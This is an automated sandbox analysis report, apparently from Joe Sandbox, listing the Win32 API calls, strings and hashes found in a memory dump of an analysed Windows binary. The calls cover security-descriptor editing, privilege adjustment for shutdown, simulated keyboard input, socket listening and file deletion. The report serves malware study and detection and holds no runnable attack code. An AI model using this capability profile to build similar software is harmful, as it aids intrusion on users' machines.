                                                                                                                    • Part of subcall function 00DAB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DAB3CB), ref: 00DAB923
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DAB93A
                                                                                                                    • Part of subcall function 00DAB982: GetProcessHeap.KERNEL32(00000008,00DAB3E1,00000000,00000000,?,00DAB3E1,?), ref: 00DAB98E
                                                                                                                    • Part of subcall function 00DAB982: RtlAllocateHeap.NTDLL(00000000,?,00DAB3E1), ref: 00DAB995
                                                                                                                    • Part of subcall function 00DAB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DAB3E1,?), ref: 00DAB9A6
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DAB3FC
                                                                                                                  • _memset.LIBCMT ref: 00DAB411
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DAB430
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB441
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00DAB47E
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DAB49A
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB4B7
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DAB4C6
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00DAB4CD
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DAB4EE
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00DAB4F5
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DAB526
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DAB54C
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DAB560
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: 1112a68e8fd0761508a2e6cd870c133a1cf493a32b902e65ea87c7f48a313079
                                                                                                                  • Instruction ID: a84a8ae37feb55f0e6dfc2e15ae56e415c0fe24c280dca1930c8763e032df824
                                                                                                                  • Opcode Fuzzy Hash: 1112a68e8fd0761508a2e6cd870c133a1cf493a32b902e65ea87c7f48a313079
                                                                                                                  • Instruction Fuzzy Hash: 99511A71900209AFDF00DFA4DC55AEEBB7AFF06314F18811AE915E6292DB359A06CF70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                    • Part of subcall function 00DB7C0C: GetFileAttributesW.KERNEL32(?,00DB6A7B), ref: 00DB7C0D
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6E7E
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DB6E99
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DB6EAE
                                                                                                                  • _wcscpy.LIBCMT ref: 00DB6EDD
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6EEF
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6F01
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00DB6F0E
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DB6F22
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DB6F3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2643075503-1173974218
                                                                                                                  • Opcode ID: b782cd2eadf08855ff5ce945010f9ac051f7c962c7457d041981fdea093161f4
                                                                                                                  • Instruction ID: 48265ac074b9ca7ede48ab71e1c01ddedf687a11421feb4cd9552db3a7992ad4
                                                                                                                  • Opcode Fuzzy Hash: b782cd2eadf08855ff5ce945010f9ac051f7c962c7457d041981fdea093161f4
                                                                                                                  • Instruction Fuzzy Hash: E821C172408344BEC711EBA0D8849EBBBDC9F59314F044A5AF5E5C3142EA34D60D8BB2
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1737998785-0
                                                                                                                  • Opcode ID: 3a58006b15b318394044522da0ba45cee8f4379d19b12e07630ef19316f89c19
                                                                                                                  • Instruction ID: f97791b20a3278ca9d0c15c74051df0c75bcdc805d0b848495a46e876d674afb
                                                                                                                  • Opcode Fuzzy Hash: 3a58006b15b318394044522da0ba45cee8f4379d19b12e07630ef19316f89c19
                                                                                                                  • Instruction Fuzzy Hash: 65217A31244216AFDB00AF24DC49F6DBBAAEF44720F048019F94ADB2A1DB70E900DFB4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DC24F6
                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DC2526
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC253A
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2555
                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DC25F3
                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DC2609
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                  • Opcode ID: 4c37181d34018c0377f017c0c53f2bd9168ec2bf62d0d595b2ff55c4f0889bca
                                                                                                                  • Instruction ID: dbff7134807da9891e1c86fd7f6fc8505ac64a6cf7e800350e6f5821d5c70585
                                                                                                                  • Opcode Fuzzy Hash: 4c37181d34018c0377f017c0c53f2bd9168ec2bf62d0d595b2ff55c4f0889bca
                                                                                                                  • Instruction Fuzzy Hash: 3941397194421AAFCF15DFA4CC59AEEBBB4FF05310F24445AE815A3291E7309A84CF70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                  • API String ID: 0-1546025612
                                                                                                                  • Opcode ID: 381d4c2d816a262a6237b0394845f9f53ddff9c3ea8b60412116eaaf9ac718c5
                                                                                                                  • Instruction ID: 99be5ff25a31c345f058f2147fb39aaecfbcef9d76ef0388725906ebb90a2fca
                                                                                                                  • Opcode Fuzzy Hash: 381d4c2d816a262a6237b0394845f9f53ddff9c3ea8b60412116eaaf9ac718c5
                                                                                                                  • Instruction Fuzzy Hash: CA92AC72E0021E8BDF24CF68C9547BDB7B1BB54314F19C1AAE959AB280E7709D91CF60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B736: GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                    • Part of subcall function 00D8B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  • ReleaseCapture.USER32 ref: 00DDEB1A
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00DDEBC2
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DDEBD5
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00DDECAE
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                  • API String ID: 973565025-2107944366
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DABF0F
                                                                                                                    • Part of subcall function 00DABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DABF3C
                                                                                                                    • Part of subcall function 00DABEC3: GetLastError.KERNEL32 ref: 00DABF49
                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00DB830C
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DC9235
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9244
                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00DC9260
                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 00DC926F
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9289
                                                                                                                  • closesocket.WS2_32(00000000), ref: 00DC929D
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279440585-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: hN$tM
                                                                                                                  • API String ID: 4104443479-658128583
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                  • _memmove.LIBCMT ref: 00DE3020
                                                                                                                  • _memmove.LIBCMT ref: 00DE3135
                                                                                                                  • _memmove.LIBCMT ref: 00DE31DC
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1300846289-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DCACD3: inet_addr.WS2_32(00000000), ref: 00DCACF5
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00DC973D
                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00DC9760
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4170576061-0
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DBF37A
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBF3AA
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBF3BF
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00DBF3D0
                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00DBF3FE
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2387731787-0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00DB439C
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00DB43B8
                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00DB4425
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00DB4483
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DDEFE2
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DEF3C3,?,?,?,?,?), ref: 00DDEFF7
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DDF041
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DEF3C3,?,?,?), ref: 00DDF077
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423138444-0
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DB221E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen
                                                                                                                  • String ID: ($|
                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00D8AE5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DC4A1E,00000000), ref: 00DC55FD
                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00DC5629
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 599397726-0
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBEA95
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DBEAEF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DBEB3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1682464887-0
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DB70D8
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00DB7115
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DB711E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 33631002-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • GetParent.USER32(?), ref: 00DEF4B5
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00D8ADDD,?,?,?,00000006,?), ref: 00DEF52F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314495775-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00DEF352,?,?,?), ref: 00DDF115
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00DDF0FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1273190321-0
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00DDF47D
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00DEF42E,?,?,?,?,?), ref: 00DDF4A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3420055661-0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DCC2E2,?,?,00000000,?), ref: 00DBD73F
                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DCC2E2,?,?,00000000,?), ref: 00DBD751
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479602957-0
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DB4B89
                                                                                                                  • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00DB4B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3536248340-0
                                                                                                                  APIs
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DAB9EC), ref: 00DAB8C5
                                                                                                                  • CloseHandle.KERNEL32(?,?,00DAB9EC), ref: 00DAB8D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 81990902-0
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00DDF59C
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00DEF3AD,?,?,?,?), ref: 00DDF5C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00D7125D,00D97A43,00D70F35,?,?,00000001), ref: 00D98E41
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00D98E4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 14613875f3c9b7ea7128167322349678299b8c58bd268935da9cab2824c6b65c
                                                                                                                  • Instruction ID: 5b32949d6c64c6fac62d889ca06716e4e20595d2925d2a92007262ab9f6a1a61
                                                                                                                  • Opcode Fuzzy Hash: 14613875f3c9b7ea7128167322349678299b8c58bd268935da9cab2824c6b65c
                                                                                                                  • Instruction Fuzzy Hash: 15B09271048B08ABEB002BA1FC09BA83FABEB08A62F008010F71D842608B635450CAA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
